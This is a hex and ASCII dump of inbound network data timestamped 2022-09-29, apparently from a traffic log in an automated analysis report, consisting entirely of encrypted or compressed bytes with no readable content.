                                                                                                                                                2022-09-29 12:51:53 UTC31536INData Raw: 69 e5 67 07 be d0 51 25 09 6e 81 1b 0e e3 dd b3 e2 82 fa 56 fd e4 be 5b 72 e5 ca fe 86 20 ec 0b 4f 9c 91 7c 54 a8 81 d0 9d 81 14 9d 09 95 f1 3b 4a 31 1e d4 c2 f5 08 a6 68 df 5c c6 29 a5 a9 e7 7b bb 0e ff 9f db 33 dd 5a d4 ba c9 05 d1 80 4f d7 6b 08 65 c2 5a c3 db 32 9c 98 90 6e 5e 3a eb 53 3a 0a b2 d1 59 1a 2d a8 1c 23 fc 9d 6a 3c 67 ad bc 56 c8 5c af 7b 67 aa 9b 92 26 df 8d 3c 0c 71 25 5c fd f5 6a 8d 1f 70 a9 ad 8f 57 cb 99 34 b9 33 60 9e d4 d5 94 b6 6e 90 ca b7 7c cb 29 a6 89 0b 3b d4 0a ac 24 ef a3 0e 12 be b1 e6 22 e6 90 b7 57 a9 99 59 3f 1f e3 5f 56 73 41 69 fa 64 44 28 8d eb 14 db 07 b0 26 70 ee b1 4b e2 22 35 a1 4b c2 93 84 ba 16 be 50 c4 84 30 da c6 90 40 b1 e4 e5 c7 c6 42 42 67 ab a8 ea 9d 45 00 3a f9 ac 4c 7e f3 91 5e 4d 50 2c 17 71 ff 54 69 ad
                                                                                                                                                Data Ascii: igQ%nV[r O|T;J1h\){3ZOkeZ2n^:S:Y-#j<gV\{g&<q%\jpW43`n|);$"WY?_VsAidD(&pK"5KP0@BBgE:L~^MP,qTi
                                                                                                                                                2022-09-29 12:51:53 UTC31552INData Raw: d2 75 c7 e1 f4 8a 70 e7 60 c7 a7 b3 03 57 8b c5 21 91 d2 cd 15 df 84 9d b4 33 1d 09 6b ae 41 88 bd 82 b7 e9 a9 75 ad 37 64 1f a7 ef c9 ea 78 6d c9 af cc f1 f8 9a c6 7d 13 10 a2 2e 1c d9 84 29 03 24 7e cd 70 25 0b 06 dd e5 5a 8d 12 6c f6 29 06 f0 6b 7b 32 a1 a8 74 dd 33 a9 ec 5a 84 10 f3 f9 d1 c7 e6 52 80 59 45 79 15 46 13 b0 8e 94 0b 5b 44 66 e4 ac 1b 35 6b 59 55 21 1e 78 57 6c 8a cd 7a 46 05 50 5a 6e 95 dc 9b 8c 22 50 ed 59 33 97 24 b3 dc b3 16 cb da 3e 2d f7 ee ee d1 04 70 8e bc f0 45 23 dc dc f4 89 21 17 b5 7f e4 0d 5d 3d fb 14 e3 78 75 64 ab 57 a2 e1 5c f3 bc 0a b9 e0 9d 14 05 b5 3e f7 92 58 36 e0 c7 f0 6e 3a a3 68 5c f1 c7 00 e0 bf 2c 62 d0 49 b2 9d 43 2a dd 69 a0 4d 41 ad 84 89 8b 3c b8 82 9b 9e fc 72 12 d8 53 9a 2c 09 65 51 03 ea 5c 49 0e eb 6b 7a
                                                                                                                                                Data Ascii: up`W!3kAu7dxm}.)$~p%Zl)k{2t3ZRYEyF[Df5kYU!xWlzFPZn"PY3$>-pE#!]=xudW\>X6n:h\,bIC*iMA<rS,eQ\Ikz
                                                                                                                                                2022-09-29 12:51:53 UTC31568INData Raw: bc a3 da c0 f1 2d e9 96 a9 75 6b 36 1f 60 7e 0d ea d7 9b fc 8b ce 69 fa 68 36 74 e1 80 21 d1 f9 67 da b1 d8 90 a5 2d 36 f7 75 f9 94 f3 6a c5 b2 ca a3 cf 87 33 53 24 6c d6 b5 db 4f dc 0f 51 a2 f8 21 3f 84 ec 39 89 81 2e d9 f3 d8 66 e6 4a 74 12 82 dd 1e 0e 93 a9 c7 a9 24 cb 9c 4c d8 98 bb 0d 88 17 a4 01 37 7c a0 23 85 66 cd 9d be 63 7a 4e 28 75 af bd 5e a3 99 32 d4 e7 7a 9d 0b 8d 78 54 c4 1c ec 50 e7 03 f4 71 85 ef 42 c8 63 97 9e 76 d3 17 c1 09 b6 9a c9 7d dd c7 01 9d ce bb d4 df fa 32 4c a2 2c 1e 80 0d a2 ee ce 9f 0a da f2 ad ba 30 11 77 51 17 20 58 c3 45 a8 48 0a d4 be 1f 33 d9 27 38 02 19 d1 8d 63 48 df 6b 4a 9b 44 9c 2c dd 90 19 8f af 3f d0 a2 14 b5 1f f5 8b c8 52 a9 c9 ca f0 d5 f8 cb 56 2f 8c 76 c7 28 3e 60 40 13 f3 8a 76 7a 56 28 5e 63 3f 42 f5 79 2d
                                                                                                                                                Data Ascii: -uk6`~ih6t!g-6uj3S$lOQ!?9.fJt$L7|#fczN(u^2zxTPqBcv}2L,0wQ XEH3'8cHkJD,?RV/v(>`@vzV(^c?By-
                                                                                                                                                2022-09-29 12:51:53 UTC31584INData Raw: 0b 80 85 b1 5f 97 1d dd 62 7f 23 b4 e0 10 75 2c 3a 9f 0a 76 d4 01 68 1c 0b d7 47 6a c7 40 9a 71 09 0d 2c 3a 85 dd e3 bd 33 bb b2 24 63 3c a4 00 36 15 29 c0 ce f4 1d db 2b af 24 5a 9f 8a ea 0b a4 26 69 b5 97 0a 1d e6 e6 21 36 27 00 79 52 4f 36 8d 43 87 87 91 1b ae 54 4b b4 50 21 5f 6e a1 e4 93 30 81 c0 4d 25 90 20 a9 71 ef 6c 0c 89 d1 97 89 de 22 e3 d7 d5 c2 b7 11 39 d6 84 17 5e 2f 5d 90 0a fa de d9 5f 27 54 20 df 84 44 1f 76 7c ca 38 4e 35 f6 1a 04 18 c2 06 1d 1d f4 6f a1 2e d7 63 bc d7 96 2d 14 c9 8a e6 3b cd 81 a6 0c e7 e5 5e 76 49 41 ab 89 e4 53 fd 8f ca fe cf c9 dc 9f 72 0a 19 49 db de 43 e7 82 75 7b 4c fe 32 cd e3 0d ee 12 47 d0 ec 40 1d 0a 8f 23 fa 6f e6 62 c6 18 a9 ed 18 79 56 26 72 c8 52 ce 7c 4d 18 c6 b1 f3 54 bc ef 28 3b 0d ed 04 00 f5 b6 29 78
                                                                                                                                                Data Ascii: _b#u,:vhGj@q,:3$c<6)+$Z&i!6'yRO6CTKP!_n0M% ql"9^/]_'T Dv|8N5o.c-;^vIASrICu{L2G@#obyV&rR|MT(;)x
                                                                                                                                                2022-09-29 12:51:53 UTC31594INData Raw: 3e 69 27 42 c0 f5 1f 54 dc 31 db 66 67 8b 03 16 b5 6a a4 8f ae db ec c2 e9 e1 c0 55 f4 9c 82 b5 ee 7f d4 76 db d8 62 ec 10 56 09 6f ec 56 c3 c2 5e 5b 6c 1d fd 56 a7 37 77 63 d1 67 c1 14 15 c7 34 ba ae 90 5e 64 b5 4f ea 61 2a 81 01 15 3c ef b5 7d bc 30 22 d6 93 8c b2 a9 82 22 8b d1 a6 b4 fd 0f a9 f5 fa 89 f5 a5 9d 42 3b e1 d8 09 c6 85 70 32 43 18 61 10 74 cd 2f f1 65 12 d4 d1 76 31 60 f8 da 16 3e 16 b3 e1 5f 28 4b f4 06 b5 b6 b3 e2 03 32 17 c0 6b ba ed 60 da c6 46 88 55 fb 8f d0 30 b6 46 e4 e8 3a bf 1c 8d bf d1 ce 02 9d 8f 73 24 14 62 03 a4 04 4f 2d 17 19 03 fa 49 6a 93 53 83 23 9e 45 df d5 c0 3f b2 b1 e0 91 4f 7f f5 bb 0a c7 4c ad 08 7a 88 3f 83 14 70 f0 97 05 83 53 ee d9 d5 11 33 66 fd 30 7e f0 43 bf 23 51 f8 80 a7 86 b9 bf 92 c6 06 84 1a 6b 15 13 d8 f3
                                                                                                                                                Data Ascii: >i'BT1fgjUvbVoV^[lV7wcg4^dOa*<}0""B;p2Cat/ev1`>_(K2k`FU0F:s$bO-IjS#E?OLz?pS3f0~C#Qk
                                                                                                                                                2022-09-29 12:51:53 UTC31610INData Raw: cd d2 76 5a 8e 2d 7c c1 03 11 30 d4 29 56 d2 7d b6 f4 a4 09 e3 49 ac 48 be 26 0f 02 63 c2 92 f0 4d 3c cf cc 7e c2 ae ba 1f 21 19 90 37 f1 ee 8c 22 bc dc ef 34 d4 5e a4 f7 6f 63 ad 83 39 44 37 45 d9 47 bf 7c f6 c4 d9 4a 4a 26 7d 7e 39 fb 63 be 04 15 a5 eb 5c aa a3 4c ee b2 68 3c 1d f7 08 12 a6 56 29 de f9 a2 a5 15 37 ab 92 c6 74 1f ee f8 cc 2e 00 1d 25 93 b2 7c a0 9b b5 62 d9 a0 9b dd 12 e0 3f 4f e2 da 8c 7e 46 71 3d e9 ed 77 b8 0a 29 7c ea 2a 6a e2 39 7d 40 77 f2 d3 9f 01 59 f4 2d 4c bc 36 36 a7 c1 a7 38 04 be c0 85 89 fb 55 7d 53 b0 ae c9 32 0a ac d8 f9 a6 4c c7 ca f2 df 14 74 33 b9 c5 db 6d 89 49 4e 93 2e 79 04 a9 4d 1b 03 65 4f 5e db 1b 24 e8 d9 f5 33 98 df bb 17 30 c3 2a ab 9f 95 fa 5f bd 92 7d 12 39 d6 7d f2 86 bf 31 48 5c 31 3a c2 73 85 b3 ed d3 c8
                                                                                                                                                Data Ascii: vZ-|0)V}IH&cM<~!7"4^oc9D7EG|JJ&}~9c\Lh<V)7t.%|b?O~Fq=w)|*j9}@wY-L668U}S2Lt3mIN.yMeO^$30*_}9}1H\1:s
                                                                                                                                                2022-09-29 12:51:53 UTC31626INData Raw: 2e 1e 3a 92 1e 32 c2 bb f4 c3 6b fb a6 65 73 47 d4 45 23 29 d6 69 6e bd b9 b1 1b 2f f4 e7 b1 b4 4a e6 e5 f2 43 60 06 50 58 e7 c3 91 bd 96 a0 9e c2 0d a3 1c 45 56 2f 53 7f fc f1 28 32 a3 0e 75 22 9c d5 50 94 88 1b 24 49 cf 08 bb 1e 4a 0c 31 50 01 ad dd ff ac 3b 93 f8 d5 13 c8 5a bd 9a b1 8c e1 49 ee f8 12 03 18 f2 20 83 48 1e 4b a0 cc 2b a4 f0 6a d5 47 2d ea b7 1c a3 98 c1 e2 20 ef 31 d6 a2 70 46 1b 89 d5 77 05 c1 f0 19 f4 6b d2 93 ca 99 f9 d7 e5 01 ef d9 bc e4 43 01 ff 12 55 86 43 8e f4 87 44 38 a5 a4 32 6b 5a 61 0d 89 8d c9 cd de 5e 84 27 d4 29 38 68 a1 4c 6a bb 9f 1b 45 d4 ad b5 40 66 a0 0d 98 b5 e1 f5 f1 a6 fe c4 a3 8b 43 4b b9 a5 85 52 02 f3 bc 81 bf 82 6b 6c 4d 0c 9d 31 27 73 ad 26 c9 41 ad 2b 56 68 26 f4 fd bb fd 3a 3a 00 0d c0 5d ca 1c 2e 2b fe 21
                                                                                                                                                Data Ascii: .:2kesGE#)in/JC`PXEV/S(2u"P$IJ1P;ZI HK+jG- 1pFwkCUCD82kZa^')8hLjE@fCKRklM1's&A+Vh&::].+!
                                                                                                                                                2022-09-29 12:51:53 UTC31642INData Raw: 37 41 03 11 3a f2 31 3b ff 80 4c 60 d3 4a 84 0b 53 9f 94 f1 8d 13 74 14 bb 59 84 65 90 de 1b 2d f7 1d f4 47 12 e7 9d b1 93 1c e5 0b 68 22 8a d0 bf fb ae 8e 34 dc 7f 19 79 9a 61 ee 4f 47 c9 a3 e0 8c bb bd 36 8f 9b dd 66 28 0b e6 f4 4d 59 60 93 30 66 b1 10 65 63 fe 1d fa d9 55 82 2e 5d 4d 44 71 0e 26 53 20 dc f4 e0 14 47 c2 d4 74 18 f4 6b 51 0a 84 76 85 9f ab ac 2c 16 72 c2 51 dc 34 66 65 16 28 73 6c 64 e7 0e 6e 21 44 ed 3b 2c 1b b4 6b fa a2 19 b3 eb 1a 31 c3 9b ae 10 9c 80 06 51 e1 19 30 b9 9f de d4 fc 5a 42 75 b3 47 d8 b9 e0 9c ee 87 5e 53 64 fe 80 23 0b 78 d2 1f e3 9d 53 63 c8 b0 f3 34 f4 ae d6 c6 34 a6 b4 d1 bb 5f 05 fe 7a 30 d9 5a d7 a3 70 61 ee ed c9 b3 bb 30 84 db f0 a2 79 29 a3 26 aa 23 49 16 0f 43 86 79 c9 3d 3e 0f d1 83 04 44 15 28 55 bf 02 54 7b
                                                                                                                                                Data Ascii: 7A:1;L`JStYe-Gh"4yaOG6f(MY`0fecU.]MDq&S GtkQv,rQ4fe(sldn!D;,k1Q0ZBuG^Sd#xSc44_z0Zpa0y)&#ICy=>D(UT{
                                                                                                                                                2022-09-29 12:51:53 UTC31658INData Raw: 70 2b bc e9 e5 41 c5 b2 bf 10 ba ef b0 5b 81 a3 95 09 7e de 92 d8 9f 45 03 c2 8c 78 73 34 b4 a8 18 b0 f1 5d d7 8c 63 62 61 c0 51 f5 f6 44 84 d5 85 53 2f 72 66 45 a2 4b 44 92 50 29 db 58 22 7e dc 24 a3 7a a8 6e 96 14 31 d4 37 0f 90 9b 55 bc 03 e2 e6 1a 76 76 f8 6a ea ad c8 ad 6e 14 90 5a 93 d7 dd 2b 06 7a a5 9d fc 1f c8 ac 6b 78 a3 0f e7 bb 6b aa 48 ea 55 ae ee a0 19 37 b4 4a 4b dd 42 43 79 c9 66 af 07 01 b0 23 1b 52 36 bf 19 93 cd 9b ad 42 07 03 23 f8 a1 88 67 57 21 50 16 89 76 10 2c 2d 52 29 ea 45 bf b6 b0 e1 45 fa 41 c3 99 7b 79 02 ce dc d2 a1 df 65 a8 36 a1 02 b2 72 6b cb 6a c1 df 2e fd a9 58 c7 e7 5c 76 b8 15 ef 84 c6 41 7b 3a 71 fa 9f d3 e5 21 88 ee 77 43 9f 41 83 f2 a6 f6 40 14 48 0e e8 bf ee 9b c1 4c 6e 2d bf ce 0b bf 90 64 7e a1 3d be 35 9b 42 24
                                                                                                                                                Data Ascii: p+A[~Exs4]cbaQDS/rfEKDP)X"~$zn17UvvjnZ+zkxkHU7JKBCyf#R6B#gW!Pv,-R)EEA{ye6rkj.X\vA{:q!wCA@HLn-d~=5B$
                                                                                                                                                2022-09-29 12:51:53 UTC31674INData Raw: 58 39 d1 d5 37 30 ed fa d2 75 2a 78 fa 8f c5 da 1d 79 ab da 84 76 de 3b cc f9 78 8e 05 4c 38 0a ba 2c e6 2c a7 f7 10 f4 24 07 90 cb 84 e3 b3 08 77 0f 1c d2 e4 b7 51 99 9e d3 73 72 4d 23 fe 43 5e 08 39 23 db b9 fa 2e 5e 7d a0 17 19 8e 09 a3 a9 fe ba 06 20 68 4d 40 2e 2d 3f 28 ef 17 0f 04 f0 0c 13 ce eb 7d 8a 2d 39 fb 57 e0 58 25 f7 7e b1 08 4d d8 5a cb c1 af 48 a6 c9 c6 54 76 76 0b 9e 8b 59 c9 45 5d c2 ae 01 19 40 84 30 ce a9 f7 49 14 9a b6 e3 9f 49 e2 3f 5d 3e 91 19 e7 fc 05 eb 7d 2d 09 76 45 05 87 40 38 66 2c 36 46 08 72 20 36 43 b6 ec 28 12 85 da f8 ed 83 df 5c f4 3b 8f 62 ec 24 c5 37 2d 48 45 24 10 4c 5c 6f ff de 8e ec 51 88 e9 1f ad c8 0e 08 47 36 34 48 74 86 ce b3 ca 8b a5 c1 db a5 05 76 e0 5f bb 33 20 96 b2 89 e6 8d 57 d3 e2 f7 5f 4d ec 7f cb 0f ce
                                                                                                                                                Data Ascii: X970u*xyv;xL8,,$wQsrM#C^9#.^} hM@.-?(}-9WX%~MZHTvvYE]@0II?]>}-vE@8f,6Fr 6C(\;b$7-HE$L\oQG64Htv_3 W_M
                                                                                                                                                2022-09-29 12:51:53 UTC31690INData Raw: 8b 18 6c 50 80 27 02 c2 7a 19 85 e0 5a e3 a9 23 b1 41 ff c6 9a 4b 77 25 58 8a db e0 6c d3 bd 85 8b 54 e4 92 7f 59 47 ca 59 7b 99 78 d6 33 08 ee 47 ca a8 fb 12 0a 64 ca 87 e8 2d e0 11 45 01 09 53 00 0f 47 0a ce 49 76 86 fb ad 30 c1 8f 3e 4b ff 04 9e 4f 4b 71 63 c9 af 88 62 54 30 15 1f 2e 8b 44 dc 6b 9d 77 2d 8e ef 44 31 14 94 68 96 e8 8a 66 07 57 f5 e4 c5 fc 6b 84 9a 7d ed 9d 06 44 5d ac ca 4a 26 9e 48 84 19 f4 c9 7e 06 27 e8 2b 62 74 ef 43 28 a7 0e b1 bf eb 87 ac 14 a8 42 5f e9 10 fa df 3f a8 5a 7b 22 bd ce e0 8c 12 1a ee 53 eb 47 4e e5 67 cf ff 84 c0 72 a9 34 21 6e 72 a0 53 3f b5 01 8c 43 1d 36 92 3e 23 05 79 3f 10 1c e7 ad 67 a6 72 a1 c2 2b 69 5c 29 9b a1 c9 f6 7b 31 b5 02 30 ff 63 d1 15 f3 c5 b2 d3 7d 05 58 5b 82 bb 64 36 bf 01 76 b6 51 1a 1b ec 97 b6
                                                                                                                                                Data Ascii: lP'zZ#AKw%XlTYGY{x3Gd-ESGIv0>KOKqcbT0.Dkw-D1hfWk}D]J&H~'+btC(B_?Z{"SGNgr4!nrS?C6>#y?gr+i\){10c}X[d6vQ
                                                                                                                                                2022-09-29 12:51:53 UTC31706INData Raw: 7a 10 99 33 15 7a 28 da dd 3a e9 01 9c e6 24 7b a2 22 23 09 2b 0a d4 8e 4e 57 06 49 0c f4 44 cf aa 5e 3a 24 d4 0f 51 3e f5 75 85 62 a4 1f 98 c8 31 e1 18 19 24 9e 6f 99 ca aa 20 5d be 1d 40 da 65 0e 52 52 18 dc da 25 4d 05 72 17 82 53 70 1c 10 e7 6f 2d 50 43 58 72 3b 8a b4 56 a8 f8 9e f0 87 48 b1 99 73 c0 35 b2 32 b5 b5 b3 0d 34 3f 26 4f 97 f5 3a 81 d7 68 0f ff 74 e4 af 4c 96 51 7a 1b 00 e9 2c 47 98 b7 1c 22 af 34 00 f3 c6 9d 0d f2 58 2d 61 a7 30 de e0 05 41 33 a2 82 84 d5 b7 be fe 17 73 36 ce 92 f3 38 35 23 a7 bd 16 94 67 58 f8 e4 f9 f3 a8 16 8b 32 6c 91 85 11 58 0c d0 2f c1 a8 bd 62 a7 90 f4 e9 dd 54 3c 34 32 16 4e c8 f2 26 3e 34 51 34 bf 06 2a e0 59 91 98 9d 55 22 77 72 c3 b7 3e 44 50 f7 e9 e0 a0 c9 59 8e e0 c4 ef c7 6f 02 65 61 7b 39 65 53 7c eb d1 c9
                                                                                                                                                Data Ascii: z3z(:${"#+NWID^:$Q>ub1$o ]@eRR%MrSpo-PCXr;VHs524?&O:htLQz,G"4X-a0A3s685#gX2lX/bT<42N&>4Q4*YU"wr>DPYoea{9eS|
                                                                                                                                                2022-09-29 12:51:53 UTC31722INData Raw: 7d 2e 13 23 9c 63 20 31 eb e2 cf 54 78 5a 57 45 47 48 85 95 e9 46 07 54 95 29 f8 ab e1 68 f7 3c 00 e4 4f 16 63 dd e1 37 0f c6 3a fb 0e 8e b0 bd db 54 bb f6 19 b9 a8 90 2b 40 34 7b 74 ad a4 14 95 3c 89 ad a6 a3 30 1c 64 71 cc 0f a0 70 30 59 d6 99 b1 c9 db a7 1d 06 e2 7f 5c ab ac 51 60 5f 01 5d 05 b7 93 1e 30 ef dd 73 ee 35 e8 d0 d3 13 18 f0 5e 3f 72 12 6b 41 f6 9a 0c 87 10 ee 8d 63 20 41 bd 63 2e df 23 6c 9f 80 6a 02 ff 0c e2 64 cb 3c 02 c9 e6 3b 16 d4 0e ba c3 90 79 cc f6 c6 8d ea ff 85 ff 92 ec a9 b1 f4 2a 23 94 d7 f0 b3 78 d5 63 ca d7 90 f1 82 1a 15 3f c5 13 f8 08 1f 33 e2 82 1b df f2 10 55 2b 58 3a b2 ca a2 20 b6 0a 61 44 21 d8 c5 91 67 18 3c dc be e9 35 8f 6a b8 fb fb 55 94 b0 4d 0c 5c 46 23 64 1e ff 5e d2 c9 63 21 04 a1 39 78 3a 86 f1 5e b6 21 30 24
                                                                                                                                                Data Ascii: }.#c 1TxZWEGHFT)h<Oc7:T+@4{t<0dqp0Y\Q`_]0s5^?rkAc Ac.#ljd<;y*#xc?3U+X: aD!g<5jUM\F#d^c!9x:^!0$
                                                                                                                                                2022-09-29 12:51:53 UTC31738INData Raw: 31 38 0e d2 cb cd ba f1 a6 87 43 07 9a db 3c a6 0f d5 9a 4b 53 ab 3a 6e c4 8c c0 6d 56 3e bc ab 7a a9 e3 30 9f 7a d8 c6 7b af d4 22 b7 27 6a db 13 50 a9 77 40 bb 1e 80 53 cf 1c 87 83 4b 12 a2 f0 56 37 b4 1a 5e b7 64 b9 c5 89 57 56 9f a5 55 e8 2c 7e ae 1e 8e 71 76 65 0a 69 0d 39 9a b2 34 0d 05 38 58 e7 b0 f3 af cd 8b 88 18 8a ef c3 87 33 f7 ae 12 59 58 86 75 bd 7e 50 b3 8a 01 21 91 7e cc f6 79 58 ab a3 e3 4a b3 63 a1 1b a8 d7 35 9c f7 8a cb 90 70 9a dc 37 73 41 18 99 c8 6f 8a 39 e6 cb b3 8b 1a 06 05 69 45 6c 8c c1 a6 16 25 74 54 d7 c0 34 3b 4c 85 07 f5 44 ab 33 1a 65 27 f0 b3 c8 ed 72 da 05 d9 48 b6 9a b6 0c 08 5d 9a fe 97 df 07 91 d1 c3 d4 85 40 ba f2 c6 c2 07 8b c9 86 a7 69 a1 39 b5 ef 25 fb 14 33 88 a5 d2 78 21 93 53 4b 70 06 42 dd 73 d9 a9 fd 7d 44 37
                                                                                                                                                Data Ascii: 18C<KS:nmV>z0z{"'jPw@SKV7^dWVU,~qvei948X3YXu~P!~yXJc5p7sAo9iEl%tT4;LD3e'rH]@i9%3x!SKpBs}D7
                                                                                                                                                2022-09-29 12:51:53 UTC31754INData Raw: de fc 63 5e 76 59 b5 de c4 f9 77 e9 c4 34 35 d2 62 94 7c d4 2c 98 4f 65 ab b0 da 06 8a d3 f0 83 c6 af 98 3f c2 96 32 9c 58 e7 01 7e 11 2f 25 8b 51 89 5a 4f 64 87 81 4b 25 cb ad 68 c8 c0 a4 f2 44 d6 ed 70 cf f8 cb d8 ba 73 0b 2c 58 1f 94 26 12 25 ba 3e 6c 3a 08 a2 23 5e a0 af 01 de f1 4a b8 2d ba fd ae ad 54 03 14 c3 a1 66 11 4b 46 4d 40 33 e1 73 d8 77 fc 9f 3a 14 e5 5a ab 75 3d 10 8e 5e 6c cf 54 30 be 4f 6d a0 a4 13 22 c0 3f 6f a1 64 e8 34 ad 09 77 bb 80 4e 1f ec c1 1a 75 b7 f5 e5 f3 ac c3 61 87 21 85 ed 2b 47 13 38 f8 58 e1 ab 44 26 5d fa c8 d1 40 33 3a 4d db 95 94 5b 71 8d 63 4d b5 a4 2e 81 46 28 5b ef f3 6c 4d 7a 7f 29 19 d0 3a 05 62 cd fb 0b 6a 76 ed 95 f0 06 fa 8d d9 37 e1 19 37 26 b4 30 1d be 67 d0 92 f1 f8 53 96 31 52 9c cf a6 0e a9 d7 74 e4 e5 cc
                                                                                                                                                Data Ascii: c^vYw45b|,Oe?2X~/%QZOdK%hDps,X&%>l:#^J-TfKFM@3sw:Zu=^lT0Om"?od4wNua!+G8XD&]@3:M[qcM.F([lMz):bjv77&0gS1Rt
                                                                                                                                                2022-09-29 12:51:53 UTC31770INData Raw: d0 03 49 2e b9 d3 64 34 e3 d8 0c 53 98 62 0c 08 73 6e 36 45 34 d9 66 28 55 4a 03 6a ce 8e 1e 8c 32 5f e3 d4 ab 69 26 53 e0 ae 9e 9b b7 ac be 20 bc f3 62 b0 d0 0c 2b 7d d7 c5 65 cb b9 56 59 b9 21 0b 17 ea 81 c4 9b 9e d1 20 26 18 cf ff 74 56 eb 6e 72 4a 8f 52 9f 0f 55 08 b1 1a 27 3e 74 12 67 1e be c5 65 d1 54 f9 03 d7 43 fd a4 e4 a1 5b aa 39 16 22 09 22 74 a4 e8 0d ae 9c 7c 31 d4 f5 b9 56 3d aa 4d 5b 2a 89 74 ba c8 28 bf b4 ab c7 dc 99 11 7f 5b be 4f 90 88 e7 2c f0 12 1b 22 00 39 74 6b 5a dd df 90 ce 9d 43 dc cd a5 40 5d 25 b3 50 d7 b9 b5 9f 75 cc 99 05 6d 3e 5c d6 e4 b1 92 cb 68 3e 56 c3 ee ca ef 38 86 69 0a 99 e4 d8 02 d1 49 c6 4c 7f 05 81 1a 4f a5 f0 37 63 96 e1 3a 0f 37 3e e1 98 a6 88 a7 c1 9a da df 53 42 b7 7e a9 25 5b 59 ba 9b ab 53 20 0a 63 3e 18 94
                                                                                                                                                Data Ascii: I.d4Sbsn6E4f(UJj2_i&S b+}eVY! &tVnrJRU'>tgeTC[9""t|1V=M[*t([O,"9tkZC@]%Pum>\h>V8iILO7c:7>SB~%[YS c>
                                                                                                                                                2022-09-29 12:51:53 UTC31786INData Raw: 2a c2 bf fa 4c 99 d2 5b f1 6d 20 6d 3c 6e cd 0f bc e1 0a 45 b8 13 61 54 53 93 4f 47 7f 05 e0 c2 90 25 b3 e4 21 84 b6 9f 44 20 85 3e 71 72 a0 5a 03 ff 3a 1c 67 a9 0e 6e 7a 58 d0 e2 b6 ed 83 4a 12 71 7a d2 a2 df 16 c5 88 83 7b f3 0b 1c 84 c9 2c a4 f2 91 64 86 86 20 90 d2 88 62 0d 09 1d e2 10 f1 6c 96 4b 94 11 87 65 44 b5 70 8f a1 8b d6 64 5c 6e bd a0 da 79 aa 07 27 71 67 1e 90 83 01 64 c9 c7 af 28 c6 2a b2 40 c5 e9 60 53 34 d1 64 bd 75 02 55 36 09 ab 38 bd b6 4e 33 f9 d2 60 2b 5a 73 d4 c0 19 4f c0 8f 13 e5 ed 71 34 c4 8d 4d 28 1e 33 1e 80 fd 87 b6 db ec 5c 87 0e e9 11 bf 20 5e 75 fb 5b e0 bb a4 f6 1d 71 d9 bc ac 27 a6 9d f0 15 74 1d af 8c 49 04 bf 52 c7 a9 e1 a4 b1 d8 78 5e 16 2e a8 c6 5e a7 26 dc 40 6a df f1 bd 1f b6 99 45 b4 f2 2a 35 42 55 ad 75 41 f2 75
                                                                                                                                                Data Ascii: *L[m m<nEaTSOG%!D >qrZ:gnzXJqz{,d blKeDpd\ny'qgd(*@`S4duU68N3`+ZsOq4M(3\ ^u[q'tIRx^.^&@jE*5BUuAu
                                                                                                                                                2022-09-29 12:51:53 UTC31802INData Raw: 91 64 63 bb f3 cd ea a4 fe 02 64 c5 9e cf e9 7b 83 0d d5 d4 38 41 5a a9 77 36 bd b1 fa 29 3f f7 94 12 38 e1 0a 81 3b 29 0d e1 fe 17 93 65 78 57 e5 64 8b 8d cf 39 a4 22 13 d3 7b fc bd 6f f4 bb b9 c4 21 56 a2 f2 ea 2a 15 dd 6a 65 7b 97 8d e7 24 b3 86 26 23 2c 59 81 48 9f 48 19 2b 25 89 e7 8e 1d bd eb d9 a3 b4 45 28 28 b9 ef e2 c9 47 29 f0 e5 e1 a0 73 73 84 2d 3c da ff dd 14 a2 b1 2f 1d bd e8 3f 12 04 ae a2 17 4d ce e8 15 c2 c8 b5 f0 87 0d 02 0e 7a 77 d9 e3 1c af 3d 2a 03 ce db 48 30 8e 8a e4 f8 d0 b0 de 07 3d d5 96 52 11 ff 95 06 14 b6 4d 15 df a5 0e d1 2d 5b a7 a0 b3 bb f0 ac b4 58 50 33 e5 c1 04 49 72 57 4b a5 4e dd ea 54 da 6e d4 b1 8a ec 84 3a b5 40 b0 62 b4 e9 f5 78 42 15 97 3a 2a 77 e7 40 3a 1a 44 14 95 53 68 64 1a 38 a4 a6 00 2a 1c d9 db c0 bc 26 ee
                                                                                                                                                Data Ascii: dcd{8AZw6)?8;)exWd9"{o!V*je{$&#,YHH+%E((G)ss-</?Mzw=*H0=RM-[XP3IrWKNTn:@bxB:*w@:DShd8*&
                                                                                                                                                2022-09-29 12:51:53 UTC31818INData Raw: a8 a9 bb 33 e3 35 09 6d 50 60 bb 3a 7c ec 99 45 d0 83 02 15 55 63 99 92 e8 5e 90 a8 e8 45 74 85 b4 cd 88 5d cc d0 44 07 3a 72 f3 a2 a5 56 ca 9e 96 b1 ac b8 cc 0e 54 79 c8 22 f7 b7 9c fe 8d 51 c5 58 4a c4 1d 32 d3 89 74 d9 39 16 08 ee 1d cf 9c 66 69 53 8b 61 41 4a 45 5c 2a 62 73 b1 79 63 af ba 17 75 cc 84 98 16 3b cf 3b 34 e6 b0 fa d2 34 ba 2e 45 82 fd 79 1e 30 91 31 1d a9 a6 c4 a0 df e0 90 ca ee 58 6e 49 2c 8e 7d 5d b9 6c 2b 52 93 2d 4d 06 cc 3c be bb 20 13 74 47 10 f5 1f b2 8a 54 72 f4 90 ab b7 db 2b a9 a7 bc 67 fb 55 4a 71 35 24 6c 02 5b 7b f7 59 b1 59 63 c7 0c dd 2b a2 14 ff 97 e1 dd 88 17 dd dd 7b 03 7c 2c 7e 84 f8 8c 04 cb 62 a7 a0 64 c6 f5 45 a8 a3 f8 d6 45 28 31 19 da 2d 3e 93 6a a5 4c 1f 77 00 75 2b 67 04 2d 59 9b a4 e4 c9 d8 32 ae b4 dc f6 af 8e
                                                                                                                                                Data Ascii: 35mP`:|EUc^Et]D:rVTy"QXJ2t9fiSaAJE\*bsycu;;44.Ey01XnI,}]l+R-M< tGTr+gUJq5$l[{YYc+{|,~bdEE(1->jLwu+g-Y2
